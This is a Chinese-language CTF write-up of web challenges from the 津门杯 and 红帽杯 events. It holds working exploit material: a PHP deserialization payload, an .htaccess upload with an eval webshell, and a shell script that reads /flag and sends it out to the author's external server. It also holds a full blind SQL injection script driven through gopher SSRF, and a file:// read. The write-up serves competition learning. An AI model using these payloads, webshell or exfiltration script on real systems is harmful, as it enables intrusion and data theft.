内容纲要
津门杯
power_cut
<?php
class logger{
public $logFile;
public $initMsg;
public $exitMsg;
function __construct($file){
// initialise variables
$this->initMsg="#--session started--#\n";
$this->exitMsg="#--session end--#\n";
$this->logFile = $file;
readfile($this->logFile);
}
function log($msg){
$fd=fopen($this->logFile,"a+");
fwrite($fd,$msg."\n");
fclose($fd);
}
function __destruct(){
echo "this is destruct";
}
}
class weblog {
public $weblogfile;
function __construct() {
$flag="system('echo flag{123}')";
echo "$flag";
}
function __wakeup(){
// self::waf($this->filepath);
$obj = new logger($this->weblogfile);
}
public function waf($str){
$str=preg_replace("/[<>*#'|?\n ]/","",$str);
$str=str_replace('flag','',$str);
return $str;
}
function __destruct(){
echo "this is destruct";
}
}
$log = $_GET['log'];
$log = preg_replace("/[<>*#'|?\n ]/","",$log);
$log = str_replace('flag','',$log);
$log_unser = unserialize($log);
?>readfile直接回显输出
payload
log=O:6:"weblog":1:{s:10:"weblogfile";s:5:"/flflagag";}
uploadhub
上传.htaccess
<FilesMatch "index">
SetHandler application/x-httpd-php
php_flag engine on
Require all granted
</FilesMatch>
#start:<?php eval($_GET['cmd']);?>:end
php_value auto_prepend_file ".htaccess"随便上传一个带index的文件,执行就行
hate_php
一开始尝试异或取反来绕过正则,比如下面这个
(~%8F%97%8F%96%91%99%90)();结果不行,找原因,发现PHP版本是5.6
然后找到这篇
无字母数字Webshell之提高篇_执行 (sohu.com)
因为是eval,不是system,而且因为过滤不能在eval里用system,只能用““.
所以没有回显,因此尝试写文件后访问,结果写不了,尝试curl或者wget传参回自己服务器结果也不行,最后想到可以用shell执行php的file_get_contents来访问自己服务器。构造post报文如下
POST /?code=`.%20/???/????????[?-[]`; HTTP/1.1
Host: 122.112.214.101:20004
Content-Length: 389
Pragma: no-cache
Cache-Control: no-cache
Origin: http://122.112.214.101:20004/
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryflRQ1tAa2PBCh9My
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.56
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
x-forwarded-for: 165.62.3.27
Connection: close
------WebKitFormBoundaryflRQ1tAa2PBCh9My
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream
#!/bin/sh
a=`cat /flag`;php -r "file_get_contents('http://3423.cn1.utools.club/a.php?nani=$a');"
------WebKitFormBoundaryflRQ1tAa2PBCh9My
Content-Disposition: form-data; name="submit"
提交
------WebKitFormBoundaryflRQ1tAa2PBCh9My--自己的服务器里就有flag了
easysql
这题有点难
先得扫目录发现有admin.php,不过直接访问会被302跳转到index.php
使用curl gopher访问admin.php可以访问
然后根据提示尝试post传参poc尝试注入
盲注脚本如下,注意需要根据长度修改content-length的值
# by CubeStone
import requests
import time
import sys
def Injector(url,length,sleep,method=None,data=None,known="",sign=None):
sign=sign if method=="post" else method
basename=known
length=int(length)
sleep=float(sleep)
for i in range(1,length+1):
try:
if basename[-1]=='\0':
break
except:pass
l=31;r=128;p=(l+r)//2
while l<r:
print(chr(p),end="\r")
try:
if method!="post":
res=requests.get(url.replace("76",str(len(str(p))-2+len(str(len(known)+i))-1+76)).format(char=p,length=len(known)+i),timeout=5)
else:
res=requests.post(url,data=bytes(data.format(char=p,length=len(known)+i),encoding="utf-8"),timeout=2,headers={"content-type":"application/x-www-form-urlencoded"})
except Exception as e:
l=p+1
else:
if sign==None:
r=p
elif sign not in res.text:
l=p+1
else:
r=p
p=(l+r)//2
basename+=chr(p)
print(basename)
if sleep!=0:time.sleep(sleep)
return(basename)
if __name__ == "__main__":
if len(sys.argv) <=2:
print("usage: python3 AutoInjector.py <url:http://xxx?\\payload> <length> <sleep> [<method:post> <data:\\payload>] [knownwords] [suscess_sign] \n\\payload:must include '{length}' '{char}',and 'sleep(2)' if no [sucess_sign]\nExample: python3 BlindInjector.py \"http://826a3fbc-cf97-4e95-95bf-5bae549406a0.node3.buuoj.cn/check.php?username=' or sleep(2) and ascii(mid((SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'geek'),{length},1)>{char} and '1&password=683union\" 20 0.2")
else:
# print(sys.argv)
Injector(*sys.argv[1:])
print(" ")payload如下
python .\CompareInjector.py "http://121.36.147.29:20001/?url=gopher%3A%2F%2F127.0.0.1%3A80%2F_POST%20%2Fadmin.php%20HTTP%2F1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2Fx-www-form-urlencoded%250d%250aContent-Length%3A%2076%250d%250a%250d%250apoc%253D1)%2520and%2520if(ascii(mid((SELECT%2520%2560flag%2560%2520FROM%2520%2560flag%2560)%252C{length}%252C1))%253E{char}%252Csleep(9)%252C0)%2520--%2520" 40 0.2红帽杯
find_it
扫目录发现robots.txt
发现index.php有备份:
.1ndexx.php.swp
拿到源码,审计发现可以写文件,尝试写个phpinfo
?code=<?php%20phpinfo();?>结果发现phpinfo里有flag。
framework
yiiframework框架题,盲猜是cve,百度到去年yii2有个反序列化漏洞,根据网上复现的blog,yii的版本要小于2.0.35,题目提供了源码,看了一下版本是2.0.32估计就是这个洞了。审计一下发现sitecontroller里有unserialize可利用。本地搭环境复现成功。
websitemanager
F12发现图片是用image.php?id=xxx载入的,尝试注入获取用户名密码
if(ascii(mid((select%0agroup_concat(password)from(users)),%d,1))>%d,1,0)
登陆成功跳到curl.php,尝试file协议读flag文件
file:///flag
完成
大佬tql